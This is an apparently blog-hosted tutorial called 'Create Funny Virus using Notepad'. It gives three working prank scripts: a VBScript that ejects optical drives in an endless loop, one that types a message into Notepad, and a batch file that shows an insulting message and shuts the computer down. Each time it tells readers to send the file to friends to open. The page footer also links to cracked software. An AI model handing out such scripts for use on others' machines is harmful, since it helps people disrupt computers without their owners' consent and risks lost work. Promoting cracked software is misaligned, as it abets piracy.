Skip to main content

Create Funny Virus using Notepad..

A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also used to refer to other types of malware and programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer.

Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.
Do you know that we can make simple viruses by using Notepad? Notepad is a simple but very powerful tool to make viruses. Let us have fun with some Viruses (developed on notepad).


1. Continuously pop out CD or DVD Drive:
Open Notepad and Type the following code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.
2. Type any message in notepad automatically and scare your friends :

Open Notepad and Type the following code :
WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

3. Show a error message and shut down friends computer :

Open Notepad and Type the following code :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

You can change the message by replacing the text by your message.
Save it as abc.bat. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

Popular posts from this blog

Aston Windows Shell 2.0.3 (+ 61 windows skin + crack)

Gladiators Software announces the release of Aston version 2.x. This surprisingly smart, considered, at once sophisticated and simple shell replaces the standard Windows desktop and makes it more usable, beautiful and customizable. Many Windows users find standard shell too rigid and inflexible. Aston offers the completely unique approach with yet unseen features and themes with live wallpaper. The basic feature that makes it so unique is that Aston is fully skinnable and customizable. You can freely choose from many themes and pick the one that suits you the most. If you want to give your designing skills a try you can even make your own theme. The advanced skinning engine is very intuitive and your imagination is the only limit. Every element of the theme: menu, desktop, panels - can be tweaked and customized, thus letting one create the most convenient working area. Widgets push the limits of usability and customization even further. You want to know the weather forecast, your syste...

Windows Media Player 11 [No Activation Required]

Code: The latest iteration of Windows Media Player adds a lot of useful bells and whistles, succeeding in many ways as a competitor to iTunes for Windows. A tree-style file directory makes it easy to find the music you want quickly, and a simple search box gets you where you want to go immediately. A five-star rating system lets you rate your music, then organize it by rating, so it’s easy to group your favorite songs. Drag-and-drop functionality and a handy Create Playlist button take any confusion out of the process of making your own playlists. Creating the perfect mix CD is equally as easy–simply drag and drop songs into a Burn List in the right panel, then click Start Burn to finish. Ripping was reasonably fast on our test machine, and the program let us pick our preferred bit rate and audio file type. The biggest new feature in WMP11 is the ability to sign up with paid music and video services. Without registering, we were able to browse various sites and comp...

Real Desktop

Real Desktop is an application able to turn the user PC desktop in something similar to a real one (physical). This program asks the user if (s)he wants the current desktop icons sorted or unsorted, the very first time the application is started. Once it is running, the application shows 3D icons (same as existing ones) sitting on a virtual table (virtual desktop ) also presented in 3D. To run any of the programs that are related to the icons (links), it operates just like the regular Windows desktop: double click on one of them and the related program starts up. Now the icons are something 'physical', they can be rotated (mouse cursor on the icon corners), moved (mouse cursor on the middle area of the icon) and even 'lifted' by locating the mouse cursor on the middle area of the icon and then keep both mouse buttons pressed. When moving an icon , in this way it will 'kick' the other icons in its way and will push them away, unless the user uses the 'l...